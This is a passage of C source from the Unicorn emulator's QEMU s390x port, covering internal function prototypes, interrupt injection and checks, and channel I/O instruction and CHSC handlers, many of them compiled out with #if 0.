*/ #define decode_basedisp_rs decode_basedisp_s /* cc_helper.c */ const char *cc_name(enum cc_op cc_op); void load_psw(CPUS390XState *env, uint64_t mask, uint64_t addr); uint32_t calc_cc(CPUS390XState *env, uint32_t cc_op, uint64_t src, uint64_t dst, uint64_t vr); /* cpu.c */ unsigned int s390_cpu_halt(S390CPU *cpu); void s390_cpu_unhalt(S390CPU *cpu); /* cpu_models.c */ void s390_cpu_model_register_props(CPUState *obj); void s390_cpu_model_class_register_props(CPUClass *oc); void s390_realize_cpu_model(CPUState *cs); CPUClass *s390_cpu_class_by_name(const char *name); /* excp_helper.c */ void s390x_cpu_debug_excp_handler(CPUState *cs); void s390_cpu_do_interrupt(CPUState *cpu); bool s390_cpu_exec_interrupt(CPUState *cpu, int int_req); bool s390_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); void s390x_cpu_do_unaligned_access(CPUState *cs, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); /* fpu_helper.c */ uint32_t set_cc_nz_f32(float32 v); uint32_t set_cc_nz_f64(float64 v); uint32_t set_cc_nz_f128(float128 v); #define S390_IEEE_MASK_INVALID 0x80 #define S390_IEEE_MASK_DIVBYZERO 0x40 #define S390_IEEE_MASK_OVERFLOW 0x20 #define S390_IEEE_MASK_UNDERFLOW 0x10 #define S390_IEEE_MASK_INEXACT 0x08 #define S390_IEEE_MASK_QUANTUM 0x04 uint8_t s390_softfloat_exc_to_ieee(unsigned int exc); int s390_swap_bfp_rounding_mode(CPUS390XState *env, int m3); void s390_restore_bfp_rounding_mode(CPUS390XState *env, int old_mode); int float_comp_to_cc(CPUS390XState *env, int float_compare); uint16_t float32_dcmask(CPUS390XState *env, float32 f1); uint16_t float64_dcmask(CPUS390XState *env, float64 f1); uint16_t float128_dcmask(CPUS390XState *env, float128 f1); /* gdbstub.c */ int s390_cpu_gdb_read_register(CPUState *cpu, GByteArray *buf, int reg); int s390_cpu_gdb_write_register(CPUState *cpu, uint8_t *buf, int reg); void s390_cpu_gdb_init(CPUState *cs); /* helper.c */ void s390_cpu_dump_state(CPUState *cpu, FILE *f, int flags); hwaddr s390_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); hwaddr s390_cpu_get_phys_addr_debug(CPUState *cpu, vaddr addr); uint64_t get_psw_mask(CPUS390XState *env); void s390_cpu_recompute_watchpoints(CPUState *cs); void s390x_tod_timer(void *opaque); void s390x_cpu_timer(void *opaque); void do_restart_interrupt(CPUS390XState *env); void s390_handle_wait(S390CPU *cpu); #define S390_STORE_STATUS_DEF_ADDR offsetof(LowCore, floating_pt_save_area) int s390_store_status(S390CPU *cpu, hwaddr addr, bool store_arch); int s390_store_adtl_status(S390CPU *cpu, hwaddr addr, hwaddr len); #ifndef CONFIG_USER_ONLY LowCore *cpu_map_lowcore(CPUS390XState *env); void cpu_unmap_lowcore(CPUS390XState *env, LowCore *lowcore); #endif /* CONFIG_USER_ONLY */ /* interrupt.c */ void trigger_pgm_exception(CPUS390XState *env, uint32_t code); void cpu_inject_clock_comparator(S390CPU *cpu); void cpu_inject_cpu_timer(S390CPU *cpu); void cpu_inject_emergency_signal(S390CPU *cpu, uint16_t src_cpu_addr); int cpu_inject_external_call(S390CPU *cpu, uint16_t src_cpu_addr); bool s390_cpu_has_io_int(S390CPU *cpu); bool s390_cpu_has_ext_int(S390CPU *cpu); bool s390_cpu_has_mcck_int(S390CPU *cpu); bool s390_cpu_has_int(S390CPU *cpu); bool s390_cpu_has_restart_int(S390CPU *cpu); bool s390_cpu_has_stop_int(S390CPU *cpu); void cpu_inject_restart(S390CPU *cpu); void cpu_inject_stop(S390CPU *cpu); /* ioinst.c */ void ioinst_handle_xsch(S390CPU *cpu, uint64_t reg1, uintptr_t ra); void ioinst_handle_csch(S390CPU *cpu, uint64_t 
reg1, uintptr_t ra);
void ioinst_handle_hsch(S390CPU *cpu, uint64_t reg1, uintptr_t ra);
void ioinst_handle_msch(S390CPU *cpu, uint64_t reg1, uint32_t ipb,
                        uintptr_t ra);
void ioinst_handle_ssch(S390CPU *cpu, uint64_t reg1, uint32_t ipb,
                        uintptr_t ra);
void ioinst_handle_stcrw(S390CPU *cpu, uint32_t ipb, uintptr_t ra);
void ioinst_handle_stsch(S390CPU *cpu, uint64_t reg1, uint32_t ipb,
                         uintptr_t ra);
int ioinst_handle_tsch(S390CPU *cpu, uint64_t reg1, uint32_t ipb, uintptr_t ra);
void ioinst_handle_chsc(S390CPU *cpu, uint32_t ipb, uintptr_t ra);
void ioinst_handle_schm(S390CPU *cpu, uint64_t reg1, uint64_t reg2,
                        uint32_t ipb, uintptr_t ra);
void ioinst_handle_rsch(S390CPU *cpu, uint64_t reg1, uintptr_t ra);
void ioinst_handle_rchp(S390CPU *cpu, uint64_t reg1, uintptr_t ra);
void ioinst_handle_sal(S390CPU *cpu, uint64_t reg1, uintptr_t ra);

/* mem_helper.c */
target_ulong mmu_real2abs(CPUS390XState *env, target_ulong raddr);
void probe_write_access(CPUS390XState *env, uint64_t addr, uint64_t len,
                        uintptr_t ra);

/* mmu_helper.c */
int mmu_translate(CPUS390XState *env, target_ulong vaddr, int rw, uint64_t asc,
                  target_ulong *raddr, int *flags, uint64_t *tec);
int mmu_translate_real(CPUS390XState *env, target_ulong raddr, int rw,
                       target_ulong *addr, int *flags, uint64_t *tec);

/* misc_helper.c */
int handle_diag_288(CPUS390XState *env, uint64_t r1, uint64_t r3);
void handle_diag_308(CPUS390XState *env, uint64_t r1, uint64_t r3,
                     uintptr_t ra);

/* translate.c */
void s390x_translate_init(struct uc_struct *uc);

/* sigp.c */
int handle_sigp(CPUS390XState *env, uint8_t order, uint64_t r1, uint64_t r3);
void do_stop_interrupt(CPUS390XState *env);

#endif /* S390X_INTERNAL_H */

unicorn-2.1.1/qemu/target/s390x/interrupt.c

/*
 * QEMU S/390 Interrupt support
 *
 * Copyright IBM Corp. 2012, 2014
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or (at your
 * option) any later version. See the COPYING file in the top-level directory.
 */

#include "qemu/osdep.h"
#include "qemu/log.h"
#include "cpu.h"
#include "internal.h"
#include "exec/exec-all.h"
#include "sysemu/tcg.h"
#include "hw/s390x/ioinst.h"
#include "tcg_s390x.h"
//#include "hw/s390x/s390_flic.h"

/* Ensure to exit the TB after this call!
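   The program-interruption code is only latched in cs->exception_index and
   env->int_pgm_code here; it is delivered once control returns to the CPU
   loop, so translated code must not keep running in the current TB.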
*/ void trigger_pgm_exception(CPUS390XState *env, uint32_t code) { CPUState *cs = env_cpu(env); cs->exception_index = EXCP_PGM; env->int_pgm_code = code; /* env->int_pgm_ilen is already set, or will be set during unwinding */ } void s390_program_interrupt(CPUS390XState *env, uint32_t code, uintptr_t ra) { tcg_s390_program_interrupt(env, code, ra); } void cpu_inject_clock_comparator(S390CPU *cpu) { CPUS390XState *env = &cpu->env; env->pending_int |= INTERRUPT_EXT_CLOCK_COMPARATOR; cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HARD); } void cpu_inject_cpu_timer(S390CPU *cpu) { CPUS390XState *env = &cpu->env; env->pending_int |= INTERRUPT_EXT_CPU_TIMER; cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HARD); } void cpu_inject_emergency_signal(S390CPU *cpu, uint16_t src_cpu_addr) { CPUS390XState *env = &cpu->env; g_assert(src_cpu_addr < S390_MAX_CPUS); set_bit(src_cpu_addr, env->emergency_signals); env->pending_int |= INTERRUPT_EMERGENCY_SIGNAL; cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HARD); } int cpu_inject_external_call(S390CPU *cpu, uint16_t src_cpu_addr) { CPUS390XState *env = &cpu->env; g_assert(src_cpu_addr < S390_MAX_CPUS); if (env->pending_int & INTERRUPT_EXTERNAL_CALL) { return -EBUSY; } env->external_call_addr = src_cpu_addr; env->pending_int |= INTERRUPT_EXTERNAL_CALL; cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HARD); return 0; } void cpu_inject_restart(S390CPU *cpu) { CPUS390XState *env = &cpu->env; env->pending_int |= INTERRUPT_RESTART; cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HARD); } void cpu_inject_stop(S390CPU *cpu) { CPUS390XState *env = &cpu->env; env->pending_int |= INTERRUPT_STOP; cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HARD); } /* * All of the following interrupts are floating, i.e. not per-vcpu. * We just need a dummy cpustate in order to be able to inject in the * non-kvm case. 
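 * Note that in this Unicorn port the FLIC-based injection bodies below
 * are compiled out (#if 0), so these entry points are currently no-ops.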
*/
void s390_sclp_extint(uint32_t parm)
{
#if 0
    S390FLICState *fs = s390_get_flic();
    S390FLICStateClass *fsc = s390_get_flic_class(fs);

    fsc->inject_service(fs, parm);
#endif
}

void s390_io_interrupt(uint16_t subchannel_id, uint16_t subchannel_nr,
                       uint32_t io_int_parm, uint32_t io_int_word)
{
#if 0
    S390FLICState *fs = s390_get_flic();
    S390FLICStateClass *fsc = s390_get_flic_class(fs);

    fsc->inject_io(fs, subchannel_id, subchannel_nr, io_int_parm, io_int_word);
#endif
}

void s390_crw_mchk(void)
{
#if 0
    S390FLICState *fs = s390_get_flic();
    S390FLICStateClass *fsc = s390_get_flic_class(fs);

    fsc->inject_crw_mchk(fs);
#endif
}

bool s390_cpu_has_mcck_int(S390CPU *cpu)
{
#if 0
    QEMUS390FLICState *flic = s390_get_qemu_flic(s390_get_flic());
    CPUS390XState *env = &cpu->env;

    if (!(env->psw.mask & PSW_MASK_MCHECK)) {
        return false;
    }

    /* for now we only support channel report machine checks (floating) */
    if (qemu_s390_flic_has_crw_mchk(flic) &&
        (env->cregs[14] & CR14_CHANNEL_REPORT_SC)) {
        return true;
    }
#endif
    return false;
}

bool s390_cpu_has_ext_int(S390CPU *cpu)
{
#if 0
    QEMUS390FLICState *flic = s390_get_qemu_flic(s390_get_flic());
    CPUS390XState *env = &cpu->env;

    if (!(env->psw.mask & PSW_MASK_EXT)) {
        return false;
    }

    if ((env->pending_int & INTERRUPT_EMERGENCY_SIGNAL) &&
        (env->cregs[0] & CR0_EMERGENCY_SIGNAL_SC)) {
        return true;
    }

    if ((env->pending_int & INTERRUPT_EXTERNAL_CALL) &&
        (env->cregs[0] & CR0_EXTERNAL_CALL_SC)) {
        return true;
    }

    if ((env->pending_int & INTERRUPT_EXT_CLOCK_COMPARATOR) &&
        (env->cregs[0] & CR0_CKC_SC)) {
        return true;
    }

    if ((env->pending_int & INTERRUPT_EXT_CPU_TIMER) &&
        (env->cregs[0] & CR0_CPU_TIMER_SC)) {
        return true;
    }

    if (qemu_s390_flic_has_service(flic) &&
        (env->cregs[0] & CR0_SERVICE_SC)) {
        return true;
    }
#endif
    return false;
}

bool s390_cpu_has_io_int(S390CPU *cpu)
{
#if 0
    QEMUS390FLICState *flic = s390_get_qemu_flic(s390_get_flic());
    CPUS390XState *env = &cpu->env;

    if (!(env->psw.mask & PSW_MASK_IO)) {
        return false;
    }

    return qemu_s390_flic_has_io(flic, env->cregs[6]);
#endif
    return false;
}

bool s390_cpu_has_restart_int(S390CPU *cpu)
{
    return false;
#if 0
    CPUS390XState *env = &cpu->env;

    return env->pending_int & INTERRUPT_RESTART;
#endif
}

bool s390_cpu_has_stop_int(S390CPU *cpu)
{
    CPUS390XState *env = &cpu->env;

    return env->pending_int & INTERRUPT_STOP;
}

bool s390_cpu_has_int(S390CPU *cpu)
{
    return s390_cpu_has_mcck_int(cpu) ||
           s390_cpu_has_ext_int(cpu) ||
           s390_cpu_has_io_int(cpu) ||
           s390_cpu_has_restart_int(cpu) ||
           s390_cpu_has_stop_int(cpu);
}

unicorn-2.1.1/qemu/target/s390x/ioinst.c

/*
 * I/O instructions for S/390
 *
 * Copyright 2012, 2015 IBM Corp.
 * Author(s): Cornelia Huck <cornelia.huck@de.ibm.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or (at
 * your option) any later version.
See the COPYING file in the top-level * directory. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "hw/s390x/ioinst.h" //#include "hw/s390x/s390-pci-bus.h" int ioinst_disassemble_sch_ident(uint32_t value, int *m, int *cssid, int *ssid, int *schid) { if (!IOINST_SCHID_ONE(value)) { return -EINVAL; } if (!IOINST_SCHID_M(value)) { if (IOINST_SCHID_CSSID(value)) { return -EINVAL; } *cssid = 0; *m = 0; } else { *cssid = IOINST_SCHID_CSSID(value); *m = 1; } *ssid = IOINST_SCHID_SSID(value); *schid = IOINST_SCHID_NR(value); return 0; } void ioinst_handle_xsch(S390CPU *cpu, uint64_t reg1, uintptr_t ra) { #if 0 int cssid, ssid, schid, m; SubchDev *sch; if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid)) { s390_program_interrupt(&cpu->env, PGM_OPERAND, ra); return; } trace_ioinst_sch_id("xsch", cssid, ssid, schid); sch = css_find_subch(m, cssid, ssid, schid); if (!sch || !css_subch_visible(sch)) { setcc(cpu, 3); return; } setcc(cpu, css_do_xsch(sch)); #endif } void ioinst_handle_csch(S390CPU *cpu, uint64_t reg1, uintptr_t ra) { #if 0 int cssid, ssid, schid, m; SubchDev *sch; if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid)) { s390_program_interrupt(&cpu->env, PGM_OPERAND, ra); return; } trace_ioinst_sch_id("csch", cssid, ssid, schid); sch = css_find_subch(m, cssid, ssid, schid); if (!sch || !css_subch_visible(sch)) { setcc(cpu, 3); return; } setcc(cpu, css_do_csch(sch)); #endif } void ioinst_handle_hsch(S390CPU *cpu, uint64_t reg1, uintptr_t ra) { #if 0 int cssid, ssid, schid, m; SubchDev *sch; if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid)) { s390_program_interrupt(&cpu->env, PGM_OPERAND, ra); return; } trace_ioinst_sch_id("hsch", cssid, ssid, schid); sch = css_find_subch(m, cssid, ssid, schid); if (!sch || !css_subch_visible(sch)) { setcc(cpu, 3); return; } setcc(cpu, css_do_hsch(sch)); #endif } #if 0 static int ioinst_schib_valid(SCHIB *schib) { if ((be16_to_cpu(schib->pmcw.flags) & PMCW_FLAGS_MASK_INVALID) || (be32_to_cpu(schib->pmcw.chars) & PMCW_CHARS_MASK_INVALID)) { return 0; } /* Disallow extended measurements for now. */ if (be32_to_cpu(schib->pmcw.chars) & PMCW_CHARS_MASK_XMWME) { return 0; } return 1; } #endif void ioinst_handle_msch(S390CPU *cpu, uint64_t reg1, uint32_t ipb, uintptr_t ra) { #if 0 int cssid, ssid, schid, m; SubchDev *sch; SCHIB schib; uint64_t addr; CPUS390XState *env = &cpu->env; uint8_t ar; addr = decode_basedisp_s(env, ipb, &ar); if (addr & 3) { s390_program_interrupt(env, PGM_SPECIFICATION, ra); return; } if (s390_cpu_virt_mem_read(cpu, addr, ar, &schib, sizeof(schib))) { s390_cpu_virt_mem_handle_exc(cpu, ra); return; } if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid) || !ioinst_schib_valid(&schib)) { s390_program_interrupt(env, PGM_OPERAND, ra); return; } trace_ioinst_sch_id("msch", cssid, ssid, schid); sch = css_find_subch(m, cssid, ssid, schid); if (!sch || !css_subch_visible(sch)) { setcc(cpu, 3); return; } setcc(cpu, css_do_msch(sch, &schib)); #endif } #if 0 static void copy_orb_from_guest(ORB *dest, const ORB *src) { dest->intparm = be32_to_cpu(src->intparm); dest->ctrl0 = be16_to_cpu(src->ctrl0); dest->lpm = src->lpm; dest->ctrl1 = src->ctrl1; dest->cpa = be32_to_cpu(src->cpa); } static int ioinst_orb_valid(ORB *orb) { if ((orb->ctrl0 & ORB_CTRL0_MASK_INVALID) || (orb->ctrl1 & ORB_CTRL1_MASK_INVALID)) { return 0; } /* We don't support MIDA. 
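   MIDA (modified indirect data addressing) would make the channel
   subsystem fetch data through MIDAW lists, so any ORB requesting it is
   rejected as invalid here.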
*/
    if (orb->ctrl1 & ORB_CTRL1_MASK_MIDAW) {
        return 0;
    }
    if ((orb->cpa & HIGH_ORDER_BIT) != 0) {
        return 0;
    }
    return 1;
}
#endif

void ioinst_handle_ssch(S390CPU *cpu, uint64_t reg1, uint32_t ipb, uintptr_t ra)
{
#if 0
    int cssid, ssid, schid, m;
    SubchDev *sch;
    ORB orig_orb, orb;
    uint64_t addr;
    CPUS390XState *env = &cpu->env;
    uint8_t ar;

    addr = decode_basedisp_s(env, ipb, &ar);
    if (addr & 3) {
        s390_program_interrupt(env, PGM_SPECIFICATION, ra);
        return;
    }
    if (s390_cpu_virt_mem_read(cpu, addr, ar, &orig_orb, sizeof(orb))) {
        s390_cpu_virt_mem_handle_exc(cpu, ra);
        return;
    }
    copy_orb_from_guest(&orb, &orig_orb);
    if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid) ||
        !ioinst_orb_valid(&orb)) {
        s390_program_interrupt(env, PGM_OPERAND, ra);
        return;
    }
    trace_ioinst_sch_id("ssch", cssid, ssid, schid);
    sch = css_find_subch(m, cssid, ssid, schid);
    if (!sch || !css_subch_visible(sch)) {
        setcc(cpu, 3);
        return;
    }
    setcc(cpu, css_do_ssch(sch, &orb));
#endif
}

void ioinst_handle_stcrw(S390CPU *cpu, uint32_t ipb, uintptr_t ra)
{
#if 0
    CRW crw;
    uint64_t addr;
    int cc;
    CPUS390XState *env = &cpu->env;
    uint8_t ar;

    addr = decode_basedisp_s(env, ipb, &ar);
    if (addr & 3) {
        s390_program_interrupt(env, PGM_SPECIFICATION, ra);
        return;
    }

    cc = css_do_stcrw(&crw);
    /* 0 - crw stored, 1 - zeroes stored */
    if (s390_cpu_virt_mem_write(cpu, addr, ar, &crw, sizeof(crw)) == 0) {
        setcc(cpu, cc);
    } else {
        if (cc == 0) {
            /* Write failed: requeue CRW since STCRW is suppressing */
            css_undo_stcrw(&crw);
        }
        s390_cpu_virt_mem_handle_exc(cpu, ra);
    }
#endif
}

void ioinst_handle_stsch(S390CPU *cpu, uint64_t reg1, uint32_t ipb,
                         uintptr_t ra)
{
#if 0
    int cssid, ssid, schid, m;
    SubchDev *sch;
    uint64_t addr;
    int cc;
    SCHIB schib;
    CPUS390XState *env = &cpu->env;
    uint8_t ar;

    addr = decode_basedisp_s(env, ipb, &ar);
    if (addr & 3) {
        s390_program_interrupt(env, PGM_SPECIFICATION, ra);
        return;
    }

    if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid)) {
        /*
         * As operand exceptions have a lower priority than access exceptions,
         * we check whether the memory area is writeable (injecting the
         * access exception if it is not) first.
         */
        if (!s390_cpu_virt_mem_check_write(cpu, addr, ar, sizeof(schib))) {
            s390_program_interrupt(env, PGM_OPERAND, ra);
        } else {
            s390_cpu_virt_mem_handle_exc(cpu, ra);
        }
        return;
    }
    trace_ioinst_sch_id("stsch", cssid, ssid, schid);
    sch = css_find_subch(m, cssid, ssid, schid);
    if (sch) {
        if (css_subch_visible(sch)) {
            css_do_stsch(sch, &schib);
            cc = 0;
        } else {
            /* Indicate no more subchannels in this css/ss */
            cc = 3;
        }
    } else {
        if (css_schid_final(m, cssid, ssid, schid)) {
            cc = 3; /* No more subchannels in this css/ss */
        } else {
            /* Store an empty schib.
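               The guest then sees cc 0 with an all-zero (device-invalid)
               SCHIB and can continue probing the following subchannel
               numbers. */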
*/ memset(&schib, 0, sizeof(schib)); cc = 0; } } if (cc != 3) { if (s390_cpu_virt_mem_write(cpu, addr, ar, &schib, sizeof(schib)) != 0) { s390_cpu_virt_mem_handle_exc(cpu, ra); return; } } else { /* Access exceptions have a higher priority than cc3 */ if (s390_cpu_virt_mem_check_write(cpu, addr, ar, sizeof(schib)) != 0) { s390_cpu_virt_mem_handle_exc(cpu, ra); return; } } setcc(cpu, cc); #endif } int ioinst_handle_tsch(S390CPU *cpu, uint64_t reg1, uint32_t ipb, uintptr_t ra) { #if 0 CPUS390XState *env = &cpu->env; int cssid, ssid, schid, m; SubchDev *sch; IRB irb; uint64_t addr; int cc, irb_len; uint8_t ar; if (ioinst_disassemble_sch_ident(reg1, &m, &cssid, &ssid, &schid)) { s390_program_interrupt(env, PGM_OPERAND, ra); return -EIO; } trace_ioinst_sch_id("tsch", cssid, ssid, schid); addr = decode_basedisp_s(env, ipb, &ar); if (addr & 3) { s390_program_interrupt(env, PGM_SPECIFICATION, ra); return -EIO; } sch = css_find_subch(m, cssid, ssid, schid); if (sch && css_subch_visible(sch)) { cc = css_do_tsch_get_irb(sch, &irb, &irb_len); } else { cc = 3; } /* 0 - status pending, 1 - not status pending, 3 - not operational */ if (cc != 3) { if (s390_cpu_virt_mem_write(cpu, addr, ar, &irb, irb_len) != 0) { s390_cpu_virt_mem_handle_exc(cpu, ra); return -EFAULT; } css_do_tsch_update_subch(sch); } else { irb_len = sizeof(irb) - sizeof(irb.emw); /* Access exceptions have a higher priority than cc3 */ if (s390_cpu_virt_mem_check_write(cpu, addr, ar, irb_len) != 0) { s390_cpu_virt_mem_handle_exc(cpu, ra); return -EFAULT; } } setcc(cpu, cc); #endif return 0; } QEMU_PACK(typedef struct ChscReq { uint16_t len; uint16_t command; uint32_t param0; uint32_t param1; uint32_t param2; }) ChscReq; QEMU_PACK(typedef struct ChscResp { uint16_t len; uint16_t code; uint32_t param; char data[]; }) ChscResp; #define CHSC_MIN_RESP_LEN 0x0008 #define CHSC_SCPD 0x0002 #define CHSC_SCSC 0x0010 #define CHSC_SDA 0x0031 #define CHSC_SEI 0x000e #define CHSC_SCPD_0_M 0x20000000 #define CHSC_SCPD_0_C 0x10000000 #define CHSC_SCPD_0_FMT 0x0f000000 #define CHSC_SCPD_0_CSSID 0x00ff0000 #define CHSC_SCPD_0_RFMT 0x00000f00 #define CHSC_SCPD_0_RES 0xc000f000 #define CHSC_SCPD_1_RES 0xffffff00 #define CHSC_SCPD_01_CHPID 0x000000ff static void ioinst_handle_chsc_scpd(ChscReq *req, ChscResp *res) { #if 0 uint16_t len = be16_to_cpu(req->len); uint32_t param0 = be32_to_cpu(req->param0); uint32_t param1 = be32_to_cpu(req->param1); uint16_t resp_code; int rfmt; uint16_t cssid; uint8_t f_chpid, l_chpid; int desc_size; int m; rfmt = (param0 & CHSC_SCPD_0_RFMT) >> 8; if ((rfmt == 0) || (rfmt == 1)) { rfmt = !!(param0 & CHSC_SCPD_0_C); } if ((len != 0x0010) || (param0 & CHSC_SCPD_0_RES) || (param1 & CHSC_SCPD_1_RES) || req->param2) { resp_code = 0x0003; goto out_err; } if (param0 & CHSC_SCPD_0_FMT) { resp_code = 0x0007; goto out_err; } cssid = (param0 & CHSC_SCPD_0_CSSID) >> 16; m = param0 & CHSC_SCPD_0_M; if (cssid != 0) { if (!m || !css_present(cssid)) { resp_code = 0x0008; goto out_err; } } f_chpid = param0 & CHSC_SCPD_01_CHPID; l_chpid = param1 & CHSC_SCPD_01_CHPID; if (l_chpid < f_chpid) { resp_code = 0x0003; goto out_err; } /* css_collect_chp_desc() is endian-aware */ desc_size = css_collect_chp_desc(m, cssid, f_chpid, l_chpid, rfmt, &res->data); res->code = cpu_to_be16(0x0001); res->len = cpu_to_be16(8 + desc_size); res->param = cpu_to_be32(rfmt); return; out_err: res->code = cpu_to_be16(resp_code); res->len = cpu_to_be16(CHSC_MIN_RESP_LEN); res->param = cpu_to_be32(rfmt); #endif } #define CHSC_SCSC_0_M 0x20000000 #define CHSC_SCSC_0_FMT 
0x000f0000 #define CHSC_SCSC_0_CSSID 0x0000ff00 #define CHSC_SCSC_0_RES 0xdff000ff static void ioinst_handle_chsc_scsc(ChscReq *req, ChscResp *res) { #if 0 uint16_t len = be16_to_cpu(req->len); uint32_t param0 = be32_to_cpu(req->param0); uint8_t cssid; uint16_t resp_code; uint32_t general_chars[510]; uint32_t chsc_chars[508]; if (len != 0x0010) { resp_code = 0x0003; goto out_err; } if (param0 & CHSC_SCSC_0_FMT) { resp_code = 0x0007; goto out_err; } cssid = (param0 & CHSC_SCSC_0_CSSID) >> 8; if (cssid != 0) { if (!(param0 & CHSC_SCSC_0_M) || !css_present(cssid)) { resp_code = 0x0008; goto out_err; } } if ((param0 & CHSC_SCSC_0_RES) || req->param1 || req->param2) { resp_code = 0x0003; goto out_err; } res->code = cpu_to_be16(0x0001); res->len = cpu_to_be16(4080); res->param = 0; memset(general_chars, 0, sizeof(general_chars)); memset(chsc_chars, 0, sizeof(chsc_chars)); general_chars[0] = cpu_to_be32(0x03000000); general_chars[1] = cpu_to_be32(0x00079000); general_chars[3] = cpu_to_be32(0x00080000); chsc_chars[0] = cpu_to_be32(0x40000000); chsc_chars[3] = cpu_to_be32(0x00040000); memcpy(res->data, general_chars, sizeof(general_chars)); memcpy(res->data + sizeof(general_chars), chsc_chars, sizeof(chsc_chars)); return; out_err: res->code = cpu_to_be16(resp_code); res->len = cpu_to_be16(CHSC_MIN_RESP_LEN); res->param = 0; #endif } #define CHSC_SDA_0_FMT 0x0f000000 #define CHSC_SDA_0_OC 0x0000ffff #define CHSC_SDA_0_RES 0xf0ff0000 #define CHSC_SDA_OC_MCSSE 0x0 #define CHSC_SDA_OC_MSS 0x2 static void ioinst_handle_chsc_sda(ChscReq *req, ChscResp *res) { #if 0 uint16_t resp_code = 0x0001; uint16_t len = be16_to_cpu(req->len); uint32_t param0 = be32_to_cpu(req->param0); uint16_t oc; int ret; if ((len != 0x0400) || (param0 & CHSC_SDA_0_RES)) { resp_code = 0x0003; goto out; } if (param0 & CHSC_SDA_0_FMT) { resp_code = 0x0007; goto out; } oc = param0 & CHSC_SDA_0_OC; switch (oc) { case CHSC_SDA_OC_MCSSE: ret = css_enable_mcsse(); if (ret == -EINVAL) { resp_code = 0x0101; goto out; } break; case CHSC_SDA_OC_MSS: ret = css_enable_mss(); if (ret == -EINVAL) { resp_code = 0x0101; goto out; } break; default: resp_code = 0x0003; goto out; } out: res->code = cpu_to_be16(resp_code); res->len = cpu_to_be16(CHSC_MIN_RESP_LEN); res->param = 0; #endif } #if 0 static int chsc_sei_nt0_get_event(void *res) { /* no events yet */ return 1; } static int chsc_sei_nt0_have_event(void) { /* no events yet */ return 0; } #endif #if 0 static int chsc_sei_nt2_get_event(void *res) { if (s390_has_feat(uc, S390_FEAT_ZPCI)) { // return pci_chsc_sei_nt2_get_event(res); } return 1; } static int chsc_sei_nt2_have_event(void) { if (s390_has_feat(uc, S390_FEAT_ZPCI)) { // return pci_chsc_sei_nt2_have_event(); } return 0; } #endif #define CHSC_SEI_NT0 (1ULL << 63) #define CHSC_SEI_NT2 (1ULL << 61) static void ioinst_handle_chsc_sei(ChscReq *req, ChscResp *res) { #if 0 uint64_t selection_mask = ldq_p(&req->param1); uint8_t *res_flags = (uint8_t *)res->data; int have_event = 0; int have_more = 0; /* regarding architecture nt0 can not be masked */ have_event = !chsc_sei_nt0_get_event(res); have_more = chsc_sei_nt0_have_event(); if (selection_mask & CHSC_SEI_NT2) { if (!have_event) { have_event = !chsc_sei_nt2_get_event(res); } if (!have_more) { have_more = chsc_sei_nt2_have_event(); } } if (have_event) { res->code = cpu_to_be16(0x0001); if (have_more) { (*res_flags) |= 0x80; } else { (*res_flags) &= ~0x80; css_clear_sei_pending(); } } else { res->code = cpu_to_be16(0x0005); res->len = cpu_to_be16(CHSC_MIN_RESP_LEN); } #endif } static void 
ioinst_handle_chsc_unimplemented(ChscResp *res) { res->len = cpu_to_be16(CHSC_MIN_RESP_LEN); res->code = cpu_to_be16(0x0004); res->param = 0; } void ioinst_handle_chsc(S390CPU *cpu, uint32_t ipb, uintptr_t ra) { ChscReq *req; ChscResp *res; uint64_t addr; int reg; uint16_t len; uint16_t command; CPUS390XState *env = &cpu->env; uint8_t buf[TARGET_PAGE_SIZE]; reg = (ipb >> 20) & 0x00f; addr = env->regs[reg]; /* Page boundary? */ if (addr & 0xfff) { s390_program_interrupt(env, PGM_SPECIFICATION, ra); return; } /* * Reading sizeof(ChscReq) bytes is currently enough for all of our * present CHSC sub-handlers ... if we ever need more, we should take * care of req->len here first. */ if (s390_cpu_virt_mem_read(cpu, addr, reg, buf, sizeof(ChscReq))) { s390_cpu_virt_mem_handle_exc(cpu, ra); return; } req = (ChscReq *)buf; len = be16_to_cpu(req->len); /* Length field valid? */ if ((len < 16) || (len > 4088) || (len & 7)) { s390_program_interrupt(env, PGM_OPERAND, ra); return; } memset((char *)req + len, 0, TARGET_PAGE_SIZE - len); res = (void *)((char *)req + len); command = be16_to_cpu(req->command); switch (command) { case CHSC_SCSC: ioinst_handle_chsc_scsc(req, res); break; case CHSC_SCPD: ioinst_handle_chsc_scpd(req, res); break; case CHSC_SDA: ioinst_handle_chsc_sda(req, res); break; case CHSC_SEI: ioinst_handle_chsc_sei(req, res); break; default: ioinst_handle_chsc_unimplemented(res); break; } if (!s390_cpu_virt_mem_write(cpu, addr + len, reg, res, be16_to_cpu(res->len))) { setcc(cpu, 0); /* Command execution complete */ } else { s390_cpu_virt_mem_handle_exc(cpu, ra); } } #define SCHM_REG1_RES(_reg) (_reg & 0x000000000ffffffc) #define SCHM_REG1_MBK(_reg) ((_reg & 0x00000000f0000000) >> 28) #define SCHM_REG1_UPD(_reg) ((_reg & 0x0000000000000002) >> 1) #define SCHM_REG1_DCT(_reg) (_reg & 0x0000000000000001) void ioinst_handle_schm(S390CPU *cpu, uint64_t reg1, uint64_t reg2, uint32_t ipb, uintptr_t ra) { #if 0 uint8_t mbk; int update; int dct; CPUS390XState *env = &cpu->env; if (SCHM_REG1_RES(reg1)) { s390_program_interrupt(env, PGM_OPERAND, ra); return; } mbk = SCHM_REG1_MBK(reg1); update = SCHM_REG1_UPD(reg1); dct = SCHM_REG1_DCT(reg1); if (update && (reg2 & 0x000000000000001f)) { s390_program_interrupt(env, 